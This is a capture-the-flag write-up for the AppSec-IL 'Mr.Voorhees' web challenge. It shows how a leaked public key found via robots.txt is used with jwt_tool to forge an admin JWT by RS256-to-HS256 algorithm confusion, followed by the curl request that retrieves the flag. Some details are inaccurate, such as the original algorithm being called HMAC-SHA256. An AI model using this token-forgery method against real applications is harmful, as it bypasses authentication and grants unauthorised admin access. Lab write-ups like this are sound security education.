CTFtime.org

Mr.Voorhees

by ZyperX / ZyperX1

Tags: appsec-il jwt 

Rating:

URL :- https://mr-voorhees.appsecil.ctf.today/

###### Initial Recon:-
-----------------------------------------
###### *Directory Bruteforcing*

**[+]Found /robots.txt**

###### Robots.txt
---------------------------------
Found an endpoint '**/backup**'
*interesting*..............

https://mr-voorhees.appsecil.ctf.today/backup/public.pem

Found a key file.

###### Enumerating Web Application:-
--------------------------------------------------

Intercepted the request and found out there was a intresting cookie

[ **token**=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6IlRhbWFyYSIsImlhdCI6MTYwMzgxNjU3Mn0.VPESAFhADhpCgj-WQI9FrcMShl5wUggjQU5DdfAk6YB1VRSPTQNtf6B7ilp0ieM3dms7ZCsN7qCPrh3U9Z1YDA ]

Yup its a **jwt** token

Now i know what to do with the key file.

But before that lets gather some info on our jwt.

*KEYLENGTH* : HMAC-SHA256
*VALUES* : username = "Tamara"
iat = "232302332" #timestamp

### EXPLOITATION (TAMPERING JWT) :-
-----------------------------------------------------------------------

Fired up jwt_tool

> `python jwt_tool eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6IlRhbWFyYSIsImlhdCI6MTYwMzgxNjU3Mn0.VPESAFhADhpCgj-WQI9FrcMShl5wUggjQU5DdfAk6YB1VRSPTQNtf6B7ilp0ieM3dms7ZCsN7qCPrh3U9Z1YDA`

Select Option **1: Tamper with JWT data (multiple signing options)**

Select Option **0: Because we dont need to play with the algorithms(headers)**

Select Option **1: Tamper the username value**

change Tamara => admin

Select Option **5: Token Signing with key file**

*give the directory to the public.pem file.*

Select Keylength **1: HMAC-SHA256**

Generated the forged token :

Your new forged token:

[+] URL safe: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjAzODE2NTcyfQ.VtsLFQwmu0-XNH53bZql_ffKhT_bcytun
hV_0zz5xu0

[+] Standard: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjAzODE2NTcyfQ.VtsLFQwmu0+XNH53bZql/ffKhT/bcytun
hV/0zz5xu0

Use the token and send a GET request '/' for the flag.

`curl https://mr-voorhees.appsecil.ctf.today/ --cookie token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjAzODE2NTcyfQ.VtsLFQwmu0-XNH53bZql_ffKhT_bcytunhV_0zz5xu0`

![final](https://i.ibb.co/1nvLSyw/image.png)

***FLAG = AppSec-IL{100k_wh47_y0u_d1d_70_h1m}***

Comments